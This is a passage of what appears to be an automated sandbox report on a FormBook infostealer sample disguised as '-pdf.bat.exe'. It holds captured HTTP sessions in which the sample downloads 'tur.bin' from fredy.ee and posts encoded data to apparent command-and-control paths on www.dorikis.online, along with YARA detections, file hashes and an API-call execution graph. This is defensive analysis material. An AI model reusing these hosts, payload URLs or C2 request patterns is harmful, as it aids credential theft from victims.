                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:12:50.239214897 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:50 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
90 | 192.168.11.20 | 49820 | 162.213.249.216 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:55.417207956 CEST | 813 | OUT | POST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=GBk3MDGQZQHC6hP4CImWDunyGq0MtLj5r49NIEvxY6+ppDJ7Ex20C9UUbqFvOvsBRTEQDdSEZFaBAMxq+YKMBCShgPoFjAFYGiPvYkMT0FzpyEXt9l1vHV4ycYsrPGONqhtwC7FP1Ayv6HeShq57Aa90zODgv8C5pQgQhe2c8N2/joFmCdhB0Qdqej8WwHTrZw==
Oct 4, 2024 08:12:55.601840019 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:55 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
91 | 192.168.11.20 | 49821 | 162.213.249.216 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:58.103259087 CEST | 833 | OUT | POST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPOpnC57FzS0H9UUPaFmRfsaRT5tDfWEZFOBAI1q+pKNTiTH1foDtgFYGiPvYnw50FLpz1ntswVoL141bYsrLGOBqhsVC5xp1Cav6FGShb58Oa89/eDwicbVoTotwO3P6+qWm+U8fvVl3DBYaTF+yFSwE7+XOCxe+DhfScN8sdYSArI=
Oct 4, 2024 08:12:58.275003910 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:58 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
92 | 192.168.11.20 | 49822 | 162.213.249.216 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:13:00.794446945 CEST | 2578 | OUT | POST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Data Ascii: oz= [TRUNCATED]
Oct 4, 2024 08:13:00.794466972 CEST | 5404 | OUT
                                                                                                                                              Data Ascii: DC5dKikiP/A+n3Jbr/mmbfU/N9ZvBn7rvZzIxYXDUa000MB865fAPpPuYOT989Iybx9Dn9pEU/xncM+b1rAc1eAW2pwzC+vtYeyL9iiH47zyd6AsXVWBbbsGJmeDvH/zTcFMFZPoYdhQhjo06/7ndBMkokyu3uZSkDecSuGA+LlZQlGw4NUZ9rQjFelS4vSfbhcRyrEa0N0LBSIcxC0B5GO8o2O6xZno0U/qj/pxyLOJ8m18Uko
Oct 4, 2024 08:13:00.993580103 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:13:00 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
93 | 192.168.11.20 | 49823 | 162.213.249.216 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:13:03.490326881 CEST | 549 | OUT | GET /d84b/?oz=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:13:03.685246944 CEST | 225 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 04 Oct 2024 06:13:03 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Content-Length: 12
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                              Data Raw: 4a 44 51 4e 53 6d 47 51 51 51 58 42
                                                                                                                                              Data Ascii: JDQNSmGQQQXB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49728 | 185.86.211.136 | 443 | 2236 | C:\Users\user\Desktop\-pdf.bat.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-04 06:06:05 UTC | 184 | OUT | GET /tur.bin HTTP/1.1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Host: fredy.ee
                                                                                                                                              Connection: Keep-Alive
2024-10-04 06:06:05 UTC | 283 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 04 Oct 2024 06:06:05 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                              Connection: Upgrade, close
                                                                                                                                              Last-Modified: Thu, 03 Oct 2024 09:43:12 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Content-Length: 288320
                                                                                                                                              Vary: Accept-Encoding,User-Agent
                                                                                                                                              Content-Type: application/octet-stream



                                                                                                                                              Target ID:0
                                                                                                                                              Start time:02:05:38
                                                                                                                                              Start date:04/10/2024
                                                                                                                                              Path:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\-pdf.bat.exe"
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:920'486 bytes
                                                                                                                                              MD5 hash:2A19EAC38990809A62213E2B89BE0F60
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:02:05:56
                                                                                                                                              Start date:04/10/2024
                                                                                                                                              Path:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\-pdf.bat.exe"
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:920'486 bytes
                                                                                                                                              MD5 hash:2A19EAC38990809A62213E2B89BE0F60
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:3
                                                                                                                                              Start time:02:06:16
                                                                                                                                              Start date:04/10/2024
                                                                                                                                              Path:C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe"
                                                                                                                                              Imagebase:0x500000
                                                                                                                                              File size:140'800 bytes
                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:4
                                                                                                                                              Start time:02:06:18
                                                                                                                                              Start date:04/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\SysWOW64\ipconfig.exe"
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:29'184 bytes
                                                                                                                                              MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:false


                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:21.4%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:22.8%
                                                                                                                                                Total number of Nodes:1559
                                                                                                                                                Total number of Limit Nodes:39
API calls 4595->4597 4596->4599 4600 4051f6 4597->4600 4598->4578 4598->4580 4598->4581 4598->4587 4598->4589 4601 40561d 22 API calls 4598->4601 4614 4054ad DestroyWindow 4598->4614 4599->4590 4600->4562 4600->4599 4602 405370 GetDlgItem 4601->4602 4603 405397 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 4602->4603 4607 40538b 4602->4607 4603->4607 4604 4053ec GetSystemMenu EnableMenuItem SendMessageW 4605 405419 SendMessageW 4604->4605 4604->4607 4605->4607 4607->4603 4607->4604 4608 405e1e 22 API calls 4607->4608 4623 405606 SendMessageW 4607->4623 4624 406c2f lstrcpynW 4607->4624 4608->4607 4610 40544b lstrlenW 4611 405fbd 21 API calls 4610->4611 4612 405465 SetWindowTextW 4611->4612 4613 401399 102 API calls 4612->4613 4613->4598 4614->4575 4615 4054c7 CreateDialogParamW 4614->4615 4615->4575 4616 4054fa 4615->4616 4617 40561d 22 API calls 4616->4617 4618 405505 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4617->4618 4619 401399 102 API calls 4618->4619 4620 40554b 4619->4620 4620->4578 4621 405553 ShowWindow 4620->4621 4622 4055eb SendMessageW 4621->4622 4622->4575 4623->4607 4624->4610 5362 70312c6a 5363 70312cc3 5362->5363 5364 70312cd8 5362->5364 5363->5364 5365 70312ccd GetLastError 5363->5365 5365->5364 5366 40211b 5367 40303e 21 API calls 5366->5367 5368 402121 5367->5368 5369 405e3d 28 API calls 5368->5369 5370 40212b 5369->5370 5371 4067eb 2 API calls 5370->5371 5372 402131 5371->5372 5373 401709 5372->5373 5374 406629 5 API calls 5372->5374 5377 40215b 5372->5377 5376 40214b 5374->5376 5375 402110 CloseHandle 5375->5373 5376->5377 5379 406734 wsprintfW 5376->5379 5377->5373 5377->5375 5379->5377 4846 40291d 4847 403002 21 API calls 4846->4847 4854 40292e 4847->4854 4848 402aa2 SetFilePointer 4849 402aee 4851 402980 ReadFile 4851->4848 4851->4854 4852 406a5d ReadFile 4852->4854 4853 402a3d 4853->4848 4853->4854 4860 406599 SetFilePointer 4853->4860 4854->4848 4854->4849 4854->4851 4854->4852 4854->4853 4855 402ae4 
4854->4855 4856 4029c5 MultiByteToWideChar 4854->4856 4859 4029f6 SetFilePointer MultiByteToWideChar 4854->4859 4869 406734 wsprintfW 4855->4869 4856->4854 4859->4854 4861 4065b5 4860->4861 4864 4065d0 4860->4864 4862 406a5d ReadFile 4861->4862 4863 4065c1 4862->4863 4863->4864 4865 406601 SetFilePointer 4863->4865 4866 4065d9 SetFilePointer 4863->4866 4864->4853 4865->4864 4866->4865 4867 4065e4 4866->4867 4868 406b20 WriteFile 4867->4868 4868->4864 4869->4849 5380 40219d 5381 40303e 21 API calls 5380->5381 5382 4021a4 5381->5382 5383 4069fb 5 API calls 5382->5383 5384 4021b5 5383->5384 5385 402ea5 5384->5385 5386 4021ce GlobalAlloc 5384->5386 5386->5385 5387 4021e3 5386->5387 5388 4069fb 5 API calls 5387->5388 5389 4021ea 5388->5389 5390 4069fb 5 API calls 5389->5390 5392 4021f3 5390->5392 5391 40224e GlobalFree 5391->5385 5392->5391 5397 406734 wsprintfW 5392->5397 5394 402237 5398 406734 wsprintfW 5394->5398 5396 40224c 5396->5391 5397->5394 5398->5396 5399 401aa1 5400 401aa2 5399->5400 5401 40303e 21 API calls 5400->5401 5402 401aa7 5401->5402 5403 40682e 70 API calls 5402->5403 5404 401ab1 5403->5404 5405 404521 GetDlgItem GetDlgItem 5406 404575 7 API calls 5405->5406 5411 40479b 5405->5411 5407 404618 DeleteObject 5406->5407 5408 40460b SendMessageW 5406->5408 5410 404627 5407->5410 5408->5407 5409 4048d2 5412 404917 5409->5412 5413 4049ac 5409->5413 5416 405fbd 21 API calls 5410->5416 5417 404665 5410->5417 5411->5409 5423 4057dd 5 API calls 5411->5423 5436 40482d 5411->5436 5418 404a01 5412->5418 5419 404936 SendMessageW 5412->5419 5414 4049d7 5413->5414 5415 4049bb SendMessageW 5413->5415 5421 4049e1 5414->5421 5434 404a17 5414->5434 5415->5418 5424 40463d SendMessageW SendMessageW 5416->5424 5425 40561d 22 API calls 5417->5425 5422 40585e 8 API calls 5418->5422 5419->5418 5427 404953 SendMessageW 5419->5427 5420 4048ba SendMessageW 5420->5409 5428 4049f1 5421->5428 5429 4049ea ImageList_Destroy 5421->5429 5430 404c29 5422->5430 5423->5436 5424->5410 5426 
40467d 5425->5426 5431 40561d 22 API calls 5426->5431 5432 40496c 5427->5432 5428->5418 5433 4049fa GlobalFree 5428->5433 5429->5428 5444 404689 5431->5444 5439 404982 SendMessageW 5432->5439 5433->5418 5438 404a4e 5434->5438 5443 4055b9 102 API calls 5434->5443 5452 404be0 5434->5452 5435 404bf7 ShowWindow GetDlgItem ShowWindow 5435->5418 5436->5409 5436->5420 5437 404768 GetWindowLongW SetWindowLongW 5440 40477e 5437->5440 5453 404a8c SendMessageW 5438->5453 5454 404aa6 5438->5454 5439->5434 5441 404795 5440->5441 5442 404785 ShowWindow 5440->5442 5458 405606 SendMessageW 5441->5458 5442->5441 5443->5438 5444->5437 5445 4046e1 SendMessageW 5444->5445 5447 404730 SendMessageW 5444->5447 5448 40471d SendMessageW 5444->5448 5449 404764 5444->5449 5445->5444 5447->5444 5448->5444 5449->5437 5449->5440 5450 404b96 5451 404bb2 InvalidateRect 5450->5451 5455 404bc1 5450->5455 5451->5455 5452->5418 5452->5435 5453->5454 5454->5450 5457 404b3c SendMessageW SendMessageW 5454->5457 5455->5452 5456 405663 24 API calls 5455->5456 5456->5452 5457->5454 5458->5411 5459 402728 5460 4030c1 21 API calls 5459->5460 5461 402732 5460->5461 5462 40303e 21 API calls 5461->5462 5463 40273b 5462->5463 5464 402748 RegQueryValueExW 5463->5464 5468 401709 5463->5468 5465 402772 5464->5465 5466 40276b 5464->5466 5467 40271c RegCloseKey 5465->5467 5465->5468 5466->5465 5470 406734 wsprintfW 5466->5470 5467->5468 5470->5465 5471 402b28 5472 402b2e 5471->5472 5473 402b36 FindClose 5472->5473 5474 402ea1 5472->5474 5473->5474 5475 4025ac 5476 40303e 21 API calls 5475->5476 5477 4025bd 5476->5477 5478 40303e 21 API calls 5477->5478 5479 4025c6 5478->5479 5480 40303e 21 API calls 5479->5480 5481 4025cf GetPrivateProfileStringW 5480->5481 5482 4025f4 5481->5482 5483 401ead 5484 403002 21 API calls 5483->5484 5485 401eb4 5484->5485 5486 403002 21 API calls 5485->5486 5487 401ebd GetDlgItem 5486->5487 3815 4027b0 3825 4030c1 3815->3825 3819 4027c3 3820 4027d5 3819->3820 3824 401709 3819->3824 3821 
4027f0 RegEnumValueW 3820->3821 3822 4027e4 RegEnumKeyW 3820->3822 3823 40280e RegCloseKey 3821->3823 3822->3823 3823->3824 3833 40303e 3825->3833 3827 4030d9 3838 4063ed 3827->3838 3830 403002 3831 405fbd 21 API calls 3830->3831 3832 403016 3831->3832 3832->3819 3842 405fbd 3833->3842 3836 403076 3836->3827 3839 4063fc 3838->3839 3840 4027ba 3839->3840 3841 406405 RegOpenKeyExW 3839->3841 3840->3830 3841->3840 3843 405fc8 3842->3843 3844 406213 3843->3844 3848 4061de lstrlenW 3843->3848 3849 4060de GetSystemDirectoryW 3843->3849 3852 405fbd 15 API calls 3843->3852 3853 4060f4 GetWindowsDirectoryW 3843->3853 3854 405fbd 15 API calls 3843->3854 3856 406e52 5 API calls 3843->3856 3857 406189 lstrcatW 3843->3857 3858 406154 SHGetPathFromIDListW CoTaskMemFree 3843->3858 3868 406a8c 3843->3868 3873 4069fb GetModuleHandleA 3843->3873 3879 406734 wsprintfW 3843->3879 3880 406c2f lstrcpynW 3843->3880 3845 403067 3844->3845 3881 406c2f lstrcpynW 3844->3881 3845->3836 3859 406e52 3845->3859 3848->3843 3849->3843 3852->3848 3853->3843 3854->3843 3856->3843 3857->3843 3858->3843 3866 406e67 3859->3866 3860 406ee9 3861 406ef1 CharPrevW 3860->3861 3864 406f11 3860->3864 3861->3860 3862 406eda CharNextW 3862->3860 3862->3866 3864->3836 3865 406ec6 CharNextW 3865->3866 3866->3860 3866->3862 3866->3865 3867 406ed5 CharNextW 3866->3867 3885 40670b 3866->3885 3867->3862 3869 4063ed RegOpenKeyExW 3868->3869 3870 406aba 3869->3870 3871 406ac1 RegQueryValueExW RegCloseKey 3870->3871 3872 406af2 3870->3872 3871->3872 3872->3843 3874 406a13 3873->3874 3875 406a1d GetProcAddress 3873->3875 3882 4062b3 GetSystemDirectoryW 3874->3882 3876 406a2b 3875->3876 3876->3843 3878 406a19 3878->3875 3878->3876 3879->3843 3880->3843 3881->3845 3883 4062d5 wsprintfW LoadLibraryExW 3882->3883 3883->3878 3886 406731 3885->3886 3887 406717 3885->3887 3886->3866 3887->3886 3888 406720 CharNextW 3887->3888 3888->3886 3888->3887 3889 404c33 3890 404c50 GetDlgItem GetDlgItem GetDlgItem 3889->3890 3891 404ddc 
3889->3891 3935 405606 SendMessageW 3890->3935 3893 404de4 GetDlgItem CreateThread CloseHandle 3891->3893 3894 404e28 3891->3894 3896 404e10 3893->3896 3969 405967 OleInitialize 3893->3969 3897 404e30 3894->3897 3898 404e59 3894->3898 3895 404cc9 3905 404cd0 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3895->3905 3940 40585e 3896->3940 3897->3896 3899 404e3c ShowWindow ShowWindow 3897->3899 3900 404e61 3898->3900 3901 404ea7 3898->3901 3954 405606 SendMessageW 3899->3954 3904 404e7d ShowWindow 3900->3904 3906 404e6a 3900->3906 3901->3896 3910 404eba SendMessageW 3901->3910 3904->3906 3907 404e94 3904->3907 3908 404d20 SendMessageW SendMessageW 3905->3908 3909 404d34 3905->3909 3955 405a5b 3906->3955 3958 405e3d 3907->3958 3908->3909 3915 404d46 3909->3915 3916 404d3c SendMessageW 3909->3916 3911 404e1e 3910->3911 3912 404ed8 CreatePopupMenu 3910->3912 3918 405fbd 21 API calls 3912->3918 3936 40561d 3915->3936 3916->3915 3921 404eea AppendMenuW 3918->3921 3919 404e57 3919->3896 3920 404d58 3922 404d61 ShowWindow 3920->3922 3923 404d93 GetDlgItem SendMessageW 3920->3923 3924 404f20 TrackPopupMenu 3921->3924 3925 404f0c GetWindowRect 3921->3925 3926 404d82 3922->3926 3927 404d77 ShowWindow 3922->3927 3923->3911 3929 404dbf SendMessageW SendMessageW 3923->3929 3924->3911 3928 404f42 3924->3928 3925->3924 3939 405606 SendMessageW 3926->3939 3927->3926 3930 404f56 SendMessageW 3928->3930 3929->3911 3930->3930 3932 404f72 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3930->3932 3933 404f9e SendMessageW 3932->3933 3933->3933 3934 404fcc GlobalUnlock SetClipboardData CloseClipboard 3933->3934 3934->3911 3935->3895 3937 405fbd 21 API calls 3936->3937 3938 405628 SetDlgItemTextW 3937->3938 3938->3920 3939->3923 3941 40592c 3940->3941 3942 405876 GetWindowLongW 3940->3942 3941->3911 3942->3941 3943 40588b 3942->3943 3943->3941 3944 4058b3 GetSysColor 3943->3944 3945 4058bf 3943->3945 3944->3945 3946 4058c3 SetTextColor 3945->3946 3947 4058cd SetBkMode 
3945->3947 3946->3947 3948 4058f5 3947->3948 3949 4058e6 GetSysColor 3947->3949 3950 405906 3948->3950 3951 4058f9 SetBkColor 3948->3951 3949->3948 3950->3941 3952 405916 DeleteObject 3950->3952 3953 40591f CreateBrushIndirect 3950->3953 3951->3950 3952->3953 3953->3941 3954->3919 3956 405a62 3955->3956 3957 405a68 SendMessageW 3955->3957 3956->3957 3957->3919 3959 405e4f 3958->3959 3967 405f05 3958->3967 3960 405e6e lstrlenW 3959->3960 3961 405fbd 21 API calls 3959->3961 3962 405e80 lstrlenW 3960->3962 3963 405ea3 3960->3963 3961->3960 3964 405e95 lstrcatW 3962->3964 3962->3967 3965 405eba 3963->3965 3966 405ead SetWindowTextW 3963->3966 3964->3963 3965->3967 3968 405ebf SendMessageW SendMessageW SendMessageW 3965->3968 3966->3965 3967->3906 3968->3967 3976 4055eb 3969->3976 3971 4059b1 3972 4055eb SendMessageW 3971->3972 3974 4059c3 OleUninitialize 3972->3974 3973 40598a 3973->3971 3979 401399 3973->3979 3977 405603 3976->3977 3978 4055f4 SendMessageW 3976->3978 3977->3973 3978->3977 3980 401413 3979->3980 3982 4013a3 3979->3982 3980->3973 3982->3980 3983 4013df MulDiv SendMessageW 3982->3983 3984 40154a 3982->3984 3983->3982 3985 4015c3 3984->3985 3988 4015ce 3984->3988 3986 4016c1 3985->3986 3987 4017c2 3985->3987 3985->3988 3989 4015e6 3985->3989 3990 4018cb 3985->3990 3991 4016ef 3985->3991 3992 4016af 3985->3992 3993 40182f 3985->3993 3994 401711 3985->3994 3995 401633 SetForegroundWindow 3985->3995 3996 4017d3 3985->3996 3997 4015d5 3985->3997 3998 401618 3985->3998 3999 4015f9 3985->3999 4000 40189b 3985->4000 4001 4018de 3985->4001 4002 40163f 3985->4002 4047 40160c 3985->4047 4013 4016d1 ShowWindow 3986->4013 4014 4016d9 3986->4014 4004 40303e 21 API calls 3987->4004 3988->3982 3989->3988 4003 4015f0 PostQuitMessage 3989->4003 4008 40303e 21 API calls 3990->4008 4015 40303e 21 API calls 3991->4015 4130 406734 wsprintfW 3992->4130 4011 40303e 21 API calls 3993->4011 4005 40303e 21 API calls 3994->4005 3995->3988 4007 40303e 21 API calls 3996->4007 
